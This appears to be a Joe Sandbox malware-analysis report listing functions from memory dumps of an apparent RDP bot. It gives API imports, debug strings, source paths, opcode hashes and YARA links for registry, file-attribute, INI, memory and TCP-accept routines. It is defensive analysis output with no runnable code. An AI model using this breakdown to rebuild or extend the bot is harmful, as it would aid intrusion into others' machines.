[I] (%s) -> Done(hnd=0x%p,dwSignature=%08lx,dwStrucVersion=%08lx,dwFileVersionMS=%08lx,dwFileVersionLS=%08lx,dwProductVersionMS=%08lx,dwProductVersionLS=%08lx,dwFileFlagsMask=%08lx,dwFileFlags=%08lx,dwFileOS=%08lx,dwFileType=%08lx,dwFileSubtype=%08lx,dwFileDat, xrefs: 00007FFE13307266
(hnd != NULL), xrefs: 00007FFE13307291
module_get_version, xrefs: 00007FFE1330725F, 00007FFE13307298, 00007FFE133072C3, 00007FFE133072E6, 00007FFE1330731B

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: ErrorLast$Resource$FindLoadfflushfwrite
String ID: (hnd != NULL)$(out != NULL)$H:/Projects/rdp/bot/codebase/module.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindResourceA failed(hnd=0x%p,gle=%lu)$[E] (%s) -> LoadResource failed(hnd=0x%p,gle=%lu)$[I] (%s) -> Done(hnd=0x%p,dwSignature=%08lx,dwStrucVersion=%08lx,dwFileVersionMS=%08lx,dwFileVersionLS=%08lx,dwProductVersionMS=%08lx,dwProductVersionLS=%08lx,dwFileFlagsMask=%08lx,dwFileFlags=%08lx,dwFileOS=%08lx,dwFileType=%08lx,dwFileSubtype=%08lx,dwFileDat$module_get_version
API String ID: 2123903355-1944070753
Opcode ID: b228bda84fba99ae2280087eb6f4b943d1784af9396ce9abe5c1d3ff242421f7
Instruction ID: e49120e4f22eafd317145f4f5aec78f5c84b1f5d65299cd63072b28dba73f376
Opcode Fuzzy Hash: b228bda84fba99ae2280087eb6f4b943d1784af9396ce9abe5c1d3ff242421f7
Instruction Fuzzy Hash: 1F415471A08A46CEE750CF2AE44056977E0FB18774F000275EE6DA37A9EB3CE945CB04

Function 00007FFE1150D4B4 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 116registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.ADVAPI32 ref: 00007FFE1150D50C
RegCloseKey.ADVAPI32 ref: 00007FFE1150D531

Strings

(root != NULL), xrefs: 00007FFE1150D568
[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x), xrefs: 00007FFE1150D5D8
[E] (%s) -> RegCreateKeyExA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFE1150D609
registry_create_key, xrefs: 00007FFE1150D541, 00007FFE1150D56F, 00007FFE1150D59F, 00007FFE1150D5D1, 00007FFE1150D602
H:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFE1150D561, 00007FFE1150D591
(key != NULL), xrefs: 00007FFE1150D598
NULL, xrefs: 00007FFE1150D6B6
?, xrefs: 00007FFE1150D4F0
[I] (%s) -> Done(root=0x%p,key=%s), xrefs: 00007FFE1150D548
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1150D576, 00007FFE1150D5A6

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: CloseCreate
String ID: (key != NULL)$(root != NULL)$?$H:/Projects/rdp/bot/codebase/registry.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegCreateKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_create_key
API String ID: 2932200918-412249795
Opcode ID: 98782a279192eaa9c0840b79ffaa249c14f7fc1fdf8aba2cdbf856249d37d2f6
Instruction ID: 34e88cf154956bf382535c5b303a1a220478614c3550be97d0d7294aa1a1ecd6
Opcode Fuzzy Hash: 98782a279192eaa9c0840b79ffaa249c14f7fc1fdf8aba2cdbf856249d37d2f6
Instruction Fuzzy Hash: ED51AD62E0CE5381FB318B86E8403BD6269AF447B8F4502BADD4D576B4DF2DE9848781

Function 00007FFE13307C34 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 116registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.ADVAPI32 ref: 00007FFE13307C8C
RegCloseKey.ADVAPI32 ref: 00007FFE13307CB1

Strings

[E] (%s) -> RegCreateKeyExA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FFE13307D89
(key != NULL), xrefs: 00007FFE13307D18
(root != NULL), xrefs: 00007FFE13307CE8
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE13307CF6, 00007FFE13307D26
registry_create_key, xrefs: 00007FFE13307CC1, 00007FFE13307CEF, 00007FFE13307D1F, 00007FFE13307D51, 00007FFE13307D82
?, xrefs: 00007FFE13307C70
NULL, xrefs: 00007FFE13307E36
[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x), xrefs: 00007FFE13307D58
H:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FFE13307CE1, 00007FFE13307D11
[I] (%s) -> Done(root=0x%p,key=%s), xrefs: 00007FFE13307CC8

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: CloseCreate
String ID: (key != NULL)$(root != NULL)$?$H:/Projects/rdp/bot/codebase/registry.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegCreateKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_create_key
API String ID: 2932200918-412249795
Opcode ID: f0e8cf8de96c9b0d8cd07c3ee6880cb3e66b5c713fc15cc70bf629ac588a6a55
Instruction ID: c4648ad2ff39a1eaea6c107c929dab903d7c6b3f42530dee0c918276693dabf5
Opcode Fuzzy Hash: f0e8cf8de96c9b0d8cd07c3ee6880cb3e66b5c713fc15cc70bf629ac588a6a55
Instruction Fuzzy Hash: FE519EA2E0CE43C9FA229716E4443BC6250AB20774F4402B2D97D776B5DF2CED85C388

Function 00007FFE11507FB5 Relevance: 19.6, APIs: 4, Strings: 9, Instructions: 94stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE11507FE0
strlen.MSVCRT ref: 00007FFE11508009
strlen.MSVCRT ref: 00007FFE11508015
strlen.MSVCRT ref: 00007FFE1150802B

Strings

[I] (%s) -> Done(path=%s,path_sz=%llu), xrefs: 00007FFE11508040
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE1150805E, 00007FFE1150808E, 00007FFE115080BE
(path_sz != NULL), xrefs: 00007FFE11508095
fs_path_temp, xrefs: 00007FFE11508039, 00007FFE1150806C, 00007FFE1150809C, 00007FFE115080CC, 00007FFE11508106
(path != NULL), xrefs: 00007FFE11508065
NULL, xrefs: 00007FFE1150813F
[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x), xrefs: 00007FFE1150810D
((*path_sz) > 0), xrefs: 00007FFE115080C5
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11508073, 00007FFE115080A3, 00007FFE115080D3

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: strlen
String ID: ((*path_sz) > 0)$(path != NULL)$(path_sz != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,path_sz=%llu)$fs_path_temp
API String ID: 39653677-3852240402
Opcode ID: c4af27749207fe981cf84f54b7efe6540e3b249496424a343f4de97f3f39739e
Instruction ID: 9d3948f76704e286012dca0e9895d0432a26dbc4414df5b1d2e46403b88544f4
Opcode Fuzzy Hash: c4af27749207fe981cf84f54b7efe6540e3b249496424a343f4de97f3f39739e
Instruction Fuzzy Hash: 6C415EA1E18E4791FB129F9AE8507BD335AAF407A8F8884B5D95E072B5DE3CE506C340

Function 00007FFE133059F5 Relevance: 19.6, APIs: 4, Strings: 9, Instructions: 94stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE13305A20
strlen.MSVCRT ref: 00007FFE13305A49
strlen.MSVCRT ref: 00007FFE13305A55
strlen.MSVCRT ref: 00007FFE13305A6B

Strings

(path_sz != NULL), xrefs: 00007FFE13305AD5
[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x), xrefs: 00007FFE13305B4D
fs_path_temp, xrefs: 00007FFE13305A79, 00007FFE13305AAC, 00007FFE13305ADC, 00007FFE13305B0C, 00007FFE13305B46
((*path_sz) > 0), xrefs: 00007FFE13305B05
[I] (%s) -> Done(path=%s,path_sz=%llu), xrefs: 00007FFE13305A80
NULL, xrefs: 00007FFE13305B7F
(path != NULL), xrefs: 00007FFE13305AA5
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE13305AB3, 00007FFE13305AE3, 00007FFE13305B13
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE13305A9E, 00007FFE13305ACE, 00007FFE13305AFE

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: strlen
String ID: ((*path_sz) > 0)$(path != NULL)$(path_sz != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,path_sz=%llu)$fs_path_temp
API String ID: 39653677-3852240402
Opcode ID: eeb99714264be280ecab839d1a2263844cafb9050e92ac6339dbe7ced44462fd
Instruction ID: 1a1492df47454f08ebe2baba66acc3a4a84dd4e07a75fc635529941a8458d422
Opcode Fuzzy Hash: eeb99714264be280ecab839d1a2263844cafb9050e92ac6339dbe7ced44462fd
Instruction Fuzzy Hash: C2413BA1A0CE47C9FA119F16E8453BC6751BF607A4F4841B2DA7D372F6DE7CA9068308

Function 00007FFE1150CBF1 Relevance: 19.6, APIs: 6, Strings: 7, Instructions: 89memorystringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE1150CCB6
GetProcessHeap.KERNEL32 ref: 00007FFE1150CCC4
HeapAlloc.KERNEL32 ref: 00007FFE1150CCD5
strlen.MSVCRT ref: 00007FFE1150CCF3
GetProcessHeap.KERNEL32 ref: 00007FFE1150CD21
HeapFree.KERNEL32 ref: 00007FFE1150CD32

Strings

(buf != NULL), xrefs: 00007FFE1150CC5D
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE1150CD47
mem_alloc, xrefs: 00007FFE1150CD40
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE1150CC56, 00007FFE1150CC86
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1150CC6B, 00007FFE1150CC9B
ini_get_bytes, xrefs: 00007FFE1150CC64, 00007FFE1150CC94
(buf_sz != NULL), xrefs: 00007FFE1150CC8D

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: Heap$Processstrlen$AllocFree
String ID: (buf != NULL)$(buf_sz != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Memory allocation failed(size=%llu)$ini_get_bytes$mem_alloc
API String ID: 1318626975-3508512667
Opcode ID: e65f61464b3325a862f8e32769314e1d84930d9b540647d1102f78bdaa2dba9a
Instruction ID: 3b47ac47e01ff24792c7b58d549cc279c29322560d5eb17a8294f2424788248d
Opcode Fuzzy Hash: e65f61464b3325a862f8e32769314e1d84930d9b540647d1102f78bdaa2dba9a
Instruction Fuzzy Hash: C1314C62A09F4786FB619B93E8103B92359BF41BA4F5840F5DA1E477B5DE3CE9058340

Function 00007FFE13309671 Relevance: 19.6, APIs: 6, Strings: 7, Instructions: 89memorystringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFE13309736
GetProcessHeap.KERNEL32 ref: 00007FFE13309744
HeapAlloc.KERNEL32 ref: 00007FFE13309755
strlen.MSVCRT ref: 00007FFE13309773
GetProcessHeap.KERNEL32 ref: 00007FFE133097A1
HeapFree.KERNEL32 ref: 00007FFE133097B2

Strings

(buf != NULL), xrefs: 00007FFE133096DD
(buf_sz != NULL), xrefs: 00007FFE1330970D
mem_alloc, xrefs: 00007FFE133097C0
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE133096EB, 00007FFE1330971B
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE133096D6, 00007FFE13309706
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE133097C7
ini_get_bytes, xrefs: 00007FFE133096E4, 00007FFE13309714

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: Heap$Processstrlen$AllocFree
String ID: (buf != NULL)$(buf_sz != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Memory allocation failed(size=%llu)$ini_get_bytes$mem_alloc
API String ID: 1318626975-3508512667
Opcode ID: 9773589267af59d1e2f9a8bebb5b8434600a55e5b6ec7fd4535c89a7be8d36af
Instruction ID: 8c7bba13755ac2151f18807e7ef51e7b47ff7db47d22cfe98a200fb937220c81
Opcode Fuzzy Hash: 9773589267af59d1e2f9a8bebb5b8434600a55e5b6ec7fd4535c89a7be8d36af
Instruction Fuzzy Hash: 47315261A08E47CDFA119B13E9107BD2664AF60BB4F4440B1EA6D377BADF3DE9058348

Function 00007FFE11508E50 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 157memoryCOMMON

Download Yara Rule

APIs

isspace.MSVCRT ref: 00007FFE11508E6F
GetProcessHeap.KERNEL32 ref: 00007FFE11508EA1
HeapAlloc.KERNEL32 ref: 00007FFE11508EB5
isspace.MSVCRT ref: 00007FFE11508F20
isspace.MSVCRT ref: 00007FFE11508F59
GetProcessHeap.KERNEL32 ref: 00007FFE11508F77
HeapAlloc.KERNEL32 ref: 00007FFE11508F8B
memchr.MSVCRT ref: 00007FFE11508FC5

Part of subcall function 00007FFE11508DD4: GetProcessHeap.KERNEL32 ref: 00007FFE11508DEB
Part of subcall function 00007FFE11508DD4: HeapAlloc.KERNEL32 ref: 00007FFE11508DFC

Strings

TRANSIENT, xrefs: 00007FFE11508E50
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE11508F01, 00007FFE1150901F
mem_alloc, xrefs: 00007FFE11508EFA, 00007FFE11509018

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: Heap$AllocProcessisspace$memchr
String ID: TRANSIENT$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc
API String ID: 300437936-3670929075
Opcode ID: 9d6196f6c1cc7a6c33c89447fb9574696beb70c7937b6cbc27b436a535a12585
Instruction ID: 2a61000e56641a52e50bd85b5566ed3b7371670b6da06909fd842508c5151ee4
Opcode Fuzzy Hash: 9d6196f6c1cc7a6c33c89447fb9574696beb70c7937b6cbc27b436a535a12585
Instruction Fuzzy Hash: CA516E21F0AF8285FB559B97942077D21AA6F45BA4F1880BCDD5D0B7B5EE3CE4058310

Function 00007FFE11505564 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 135COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FFE1150563E

Part of subcall function 00007FFE11505309: GetFileAttributesA.KERNEL32 ref: 00007FFE1150532A

SetFileAttributesA.KERNEL32 ref: 00007FFE115055AB

Strings

fs_attr_set, xrefs: 00007FFE115055D7, 00007FFE11505602, 00007FFE1150564E, 00007FFE1150571D, 00007FFE11505783
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE115055C9, 00007FFE115055F4
(attr != NULL), xrefs: 00007FFE115055FB
(path != NULL), xrefs: 00007FFE115055D0
[E] (%s) -> Failed(path=%s,attr=%08lx,err=%08x), xrefs: 00007FFE11505724
NULL, xrefs: 00007FFE11505774
[E] (%s) -> SetFileAttributesA failed(path=%s,gle=%lu), xrefs: 00007FFE11505655
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE115055DE, 00007FFE11505609
[D] (%s) -> Done(path=%s,attr=%08lx), xrefs: 00007FFE1150578A

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: AttributesFile$ErrorLast
String ID: (attr != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,attr=%08lx,err=%08x)$[E] (%s) -> SetFileAttributesA failed(path=%s,gle=%lu)$fs_attr_set
API String ID: 365566950-3523202656
Opcode ID: a9c2ed5b2806be12b9350ccfd52f584c6e2761a873669e7e0f832d613a27d6b8
Instruction ID: d7ac48183c28ebc20db333465bd9bd35c13adaee87967955196dd0e88c670801
Opcode Fuzzy Hash: a9c2ed5b2806be12b9350ccfd52f584c6e2761a873669e7e0f832d613a27d6b8
Instruction Fuzzy Hash: 0051A6A1A2DE4785FB218B97E84027D325DAF007BCF5440BAD91E866B5EE6CE845CB01

Function 00007FFE13302FA4 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 135COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FFE1330307E

Part of subcall function 00007FFE13302D49: GetFileAttributesA.KERNEL32 ref: 00007FFE13302D6A

SetFileAttributesA.KERNEL32 ref: 00007FFE13302FEB

Strings

fs_attr_set, xrefs: 00007FFE13303017, 00007FFE13303042, 00007FFE1330308E, 00007FFE1330315D, 00007FFE133031C3
[D] (%s) -> Done(path=%s,attr=%08lx), xrefs: 00007FFE133031CA
[E] (%s) -> SetFileAttributesA failed(path=%s,gle=%lu), xrefs: 00007FFE13303095
NULL, xrefs: 00007FFE133031B4
(attr != NULL), xrefs: 00007FFE1330303B
[E] (%s) -> Failed(path=%s,attr=%08lx,err=%08x), xrefs: 00007FFE13303164
(path != NULL), xrefs: 00007FFE13303010
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE1330301E, 00007FFE13303049
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE13303009, 00007FFE13303034

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: AttributesFile$ErrorLast
String ID: (attr != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,attr=%08lx,err=%08x)$[E] (%s) -> SetFileAttributesA failed(path=%s,gle=%lu)$fs_attr_set
API String ID: 365566950-3523202656
Opcode ID: f07c7a94da522aa3539270919aa610d4219343fd60f7eb3ab9a52d880d5c2b6b
Instruction ID: ef223af718caec149e93bebb5a3e7f3fd26afbe1958e59b9ba90718e8a70b7aa
Opcode Fuzzy Hash: f07c7a94da522aa3539270919aa610d4219343fd60f7eb3ab9a52d880d5c2b6b
Instruction Fuzzy Hash: D951A061E0CE47CEFA649B13E9402BE6350AF25374F1041B2D97E666B6DF2CE845C709

Function 00007FFE11501EB9 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 126networkCOMMON

Download Yara Rule

APIs

select.WS2_32 ref: 00007FFE11501F64
accept.WS2_32 ref: 00007FFE11501F8B
htonl.WS2_32 ref: 00007FFE11501FBB
htons.WS2_32 ref: 00007FFE11501FCC

Part of subcall function 00007FFE115018D9: ioctlsocket.WS2_32 ref: 00007FFE115018FF

WSAGetLastError.WS2_32 ref: 00007FFE1150207E
WSAGetLastError.WS2_32 ref: 00007FFE115020BA

Strings

[I] (%s) -> Done(sock=0x%llx,client=0x%llx,h=%08x,p=%u), xrefs: 00007FFE11502015
[W] (%s) -> select timedout(sock=0x%llx), xrefs: 00007FFE1150205E
[E] (%s) -> Failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE115020CD
[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE11502091
tcp_accept, xrefs: 00007FFE1150200E, 00007FFE11502057, 00007FFE1150208A, 00007FFE115020C6

Memory Dump Source

Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorLast$accepthtonlhtonsioctlsocketselect
String ID: [E] (%s) -> Failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,client=0x%llx,h=%08x,p=%u)$[W] (%s) -> select timedout(sock=0x%llx)$tcp_accept
API String ID: 2278979430-4175654481
Opcode ID: b1022f743a2f32e36fad29669ebae11abbf00a4173a88319de3ccb1d9b5534a7
Instruction ID: 66d72237c09b7b477b4c8bb729a91099e9306b3f4de296d298e71ef66261b748
